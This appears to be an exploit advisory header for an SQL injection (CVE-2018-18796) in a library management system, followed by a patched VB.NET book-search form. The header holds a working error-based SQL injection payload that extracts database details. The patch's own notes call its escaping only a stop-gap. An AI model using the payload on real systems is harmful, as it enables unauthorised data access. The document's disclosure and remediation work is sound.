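# Exploit Title: Library Management System 1.0 - 'frmListBooks' SQL Injection
# Dork: N/A
# Date: 2018-10-29
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://www.sourcecodester.com/users/janobe
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/librarymanagementsystem.zip
# Version: 1.0
# Category: Windows
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-18796
# POC:
# 1)
# textSearch System.Windows.Forms.TextBox / [SQL]
#
# %' And (SElecT 112 FRom(SELECT CoUNT(*),conCAT((SELecT (ELT(112=112,1))),CONCAT_WS(0x203a20,USEr(),DATABASE(),VERsiON()),FLOOR(RAnD(0)*2))x FRoM INFORmaTION_SCHeMA.PLuGINS GRoUP BY x)a) AnD'%'='
#
# https://1.bp.blogspot.com/-8FBYHFTLhhQ/W9YnCQg0nZI/AAAAAAAAENM/St0sn1IYjDs5kTjvYQNtT_mBmOEv-RaIgCLcBGAs/s1600/sql1.png
#
#[PATH]/forms/frmListofBooks.vb
#...
''' <summary>
''' Book-list window. On load it shows every row of tblbooks joined to tblcategory; as the
''' user types into txtSearch it re-runs the query with a LIKE filter on title, author and
''' accession number.
'''
''' The shipped 1.0 build concatenated txtSearch.Text straight into the three LIKE literals
''' (the injection point in the POC above, CVE-2018-18796). This version escapes the term
''' before it reaches the query string; see the NOTE on EscapeLikeTerm for why that is a
''' stop-gap rather than the final fix.
''' </summary>
Public Class frmListBooks

    ' SELECT/FROM/WHERE shared by the unfiltered load and the search. Column order matters:
    ' btnAdd_Click reads column 0 (AccessionNo) and column 10 (Status) by index.
    Private Const BaseQuery As String = _
        "SELECT `AccessionNo`, `BookTitle`, `BookDesc` as 'Description', `Author`, `PublishDate`, " & _
        "`BookPublisher`, `Category`, BookType as 'typeOfBooks', `BookPrice` as 'Price', DeweyDecimal, Status " & _
        "FROM `tblbooks` b, `tblcategory` c WHERE b.`CategoryId`=c.`CategoryId`"

    ''' <summary>
    ''' Escapes a user-supplied search term for use inside a single-quoted MySQL LIKE pattern.
    ''' Backslash and single quote are escaped so the term cannot terminate the string literal;
    ''' % and _ are escaped so they match literally instead of acting as wildcards.
    '''
    ''' NOTE(review): this is a stop-gap only. reloadDtg (defined elsewhere in the project)
    ''' takes a raw SQL string, so the term cannot be bound as a parameter from this form.
    ''' The durable fix is to give reloadDtg (or a new overload) a parameterised MySqlCommand
    ''' and pass the term as @term. The backslash escaping below assumes the server's default
    ''' sql_mode; confirm NO_BACKSLASH_ESCAPES is not enabled on the target MySQL instance.
    ''' </summary>
    ''' <param name="term">Raw text from the search box; Nothing is treated as empty.</param>
    ''' <returns>The term with \ ' % _ escaped for a MySQL LIKE literal.</returns>
    Private Shared Function EscapeLikeTerm(ByVal term As String) As String
        If String.IsNullOrEmpty(term) Then Return String.Empty
        ' Backslash must be handled first so the escapes added below are not re-escaped.
        Return term.Replace("\", "\\") _
                   .Replace("'", "''") _
                   .Replace("%", "\%") _
                   .Replace("_", "\_")
    End Function

    ''' <summary>Initial, unfiltered load of the grid.</summary>
    Private Sub frmListBooks_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
        ' sql is a module-level variable in this project; it is assigned here because other
        ' code may read it after reloadDtg runs.
        sql = BaseQuery
        reloadDtg(sql, dtgList)
    End Sub

    ''' <summary>
    ''' Re-queries the grid on every keystroke, matching the escaped term as a substring of
    ''' BookTitle, Author or AccessionNo. (Handler name keeps the original typo "Serach" so the
    ''' designer-generated Handles wiring is unchanged.)
    ''' </summary>
    Private Sub txtSerach_TextChanged(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles txtSearch.TextChanged
        ' Only the escaped term is interpolated; the surrounding quotes and wildcards are fixed.
        Dim pattern As String = "%" & EscapeLikeTerm(txtSearch.Text) & "%"
        sql = BaseQuery & _
              " AND (`BookTitle` Like '" & pattern & "'" & _
              " OR `Author` Like '" & pattern & "'" & _
              " OR `AccessionNo` Like '" & pattern & "')"
        reloadDtg(sql, dtgList)
    End Sub

    ''' <summary>
    ''' Hands the selected accession number to frmBorrow if the book is available, otherwise
    ''' tells the user it is already out.
    ''' </summary>
    Private Sub btnAdd_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnAdd.Click
        Dim row = dtgList.CurrentRow
        ' No current row (empty grid / nothing selected) is the expected no-op case. The
        ' original reached this via a NullReferenceException swallowed by an empty Catch.
        If row Is Nothing Then Return

        ' Column 10 is Status and column 0 is AccessionNo in BaseQuery.
        If Convert.ToString(row.Cells(10).Value) = "Available" Then
            frmBorrow.txtAccesionNumBorrow.Text = Convert.ToString(row.Cells(0).Value)
            Me.Close()
        Else
            MsgBox("The book is already borrowed.", MsgBoxStyle.Exclamation)
        End If
    End Sub

    ''' <summary>Close button.</summary>
    Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
        Me.Close()
    End Sub

End Class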